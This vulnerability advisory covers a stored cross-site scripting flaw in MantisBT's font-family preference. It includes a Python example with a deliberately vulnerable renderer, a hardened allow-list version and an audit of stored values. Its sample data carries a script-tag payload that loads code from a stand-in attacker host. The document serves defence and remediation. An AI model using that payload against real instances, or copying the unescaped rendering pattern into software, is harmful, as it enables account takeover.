Mantis Bug Tracker Cross-Site Scripting Vulnerability Allowing Account Takeover

Vulnerability

A cross-site scripting (XSS) vulnerability has been identified in Mantis Bug Tracker (MantisBT) versions 2.11.0 through 2.28.1. Any authenticated user can inject arbitrary HTML by updating their account's font family preference. The stored value is rendered unescaped on every MantisBT page that user loads, so injected markup, including script tags, executes there; the injection is stored (persistent), not reflected. Chained with a separate Content Security Policy (CSP) bypass vulnerability also present in MantisBT, it can be used to take over the affected user's account.

Impact

Successful exploitation yields cross-site scripting: the injected script runs in the context of the session of the user whose preference was modified, with that user's privileges in MantisBT.

Reproduction

To reproduce, an authenticated user sends a POST request to the 'account_prefs_update.php' endpoint with a 'font_family' parameter whose value contains HTML, for example a script tag that loads a JavaScript file exploiting the CSP bypass. Once the preference is saved, the injected script executes whenever that user loads any MantisBT page.
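The following Python example illustrates the injection pattern described above and the two checks a practitioner would want: a hardened rendering routine that only accepts allow-listed font names, and an audit over stored preference values that flags rows carrying markup. This is an added example, not MantisBT's own code; the font allow-list, the (user_id, font_family) row shape and the sample rows (including the attacker URL) are assumptions constructed for the demonstration.

```python
"""Font-family preference injection: vulnerable rendering, hardened rendering,
and an audit of stored values. Added example, not MantisBT code; the allow-list,
row shape and sample data are assumptions made for this illustration."""
import html
import re

# Hypothetical allow-list of font names a preference form might legitimately offer.
ALLOWED_FONTS = {
    "Sans-serif", "Serif", "Monospace",
    "Arial", "Verdana", "Georgia", "Courier New",
}

# Characters that have no business in a font name and indicate HTML injection.
HTML_MARKUP = re.compile(r"[<>\"'&]")


def render_font_style_vulnerable(font_family: str) -> str:
    """The defect: embed the stored preference verbatim in a <style> block.

    A value such as '</style><script src="..."></script>' closes the style
    element early and the browser executes the script that follows.
    """
    return "<style>body { font-family: %s; }</style>" % font_family


def is_allowed_font(font_family: str) -> bool:
    """Exact match against the allow-list; no partial or case-folded matches."""
    return font_family in ALLOWED_FONTS


def render_font_style_hardened(font_family: str) -> str:
    """Reject anything outside the allow-list and fall back to a safe default,
    then escape as defence in depth so no raw value ever reaches the page."""
    if not is_allowed_font(font_family):
        font_family = "Sans-serif"  # never echo the untrusted value back
    return "<style>body { font-family: %s; }</style>" % html.escape(font_family, quote=True)


def audit_prefs(rows):
    """Flag stored preferences that are not an allowed font or contain markup.

    rows: iterable of (user_id, font_family) pairs, e.g. exported from the
    user-preference table of a MantisBT instance (row shape is an assumption).
    Returns the offending (user_id, font_family) pairs in input order.
    """
    suspicious = []
    for user_id, font_family in rows:
        if not is_allowed_font(font_family) or HTML_MARKUP.search(font_family):
            suspicious.append((user_id, font_family))
    return suspicious


# Constructed sample rows; row 3 carries the kind of payload the advisory describes.
SAMPLE_ROWS = [
    (1, "Sans-serif"),
    (2, "Courier New"),
    (3, '</style><script src="https://attacker.example/takeover.js"></script>'),
]

if __name__ == "__main__":
    payload = SAMPLE_ROWS[2][1]
    print("vulnerable:", render_font_style_vulnerable(payload))
    print("hardened:  ", render_font_style_hardened(payload))
    print("flagged:   ", audit_prefs(SAMPLE_ROWS))
```

Running the script shows the vulnerable renderer emitting a live script tag while the hardened renderer substitutes the default font; the audit function is the check to run against existing preference data after upgrading, since patching the renderer does not remove payloads already stored.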

Remediation

Upgrade to MantisBT version 2.28.2, which fixes this vulnerability.

Added: May 26, 2026, 2:47 PM
Updated: May 26, 2026, 2:47 PM

Vulnerability Rating

Custom Algorithm

spread: 5.0
impact: 1.7
exploitability: 6.6
remediation: 7.7
relevance: 9.1
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.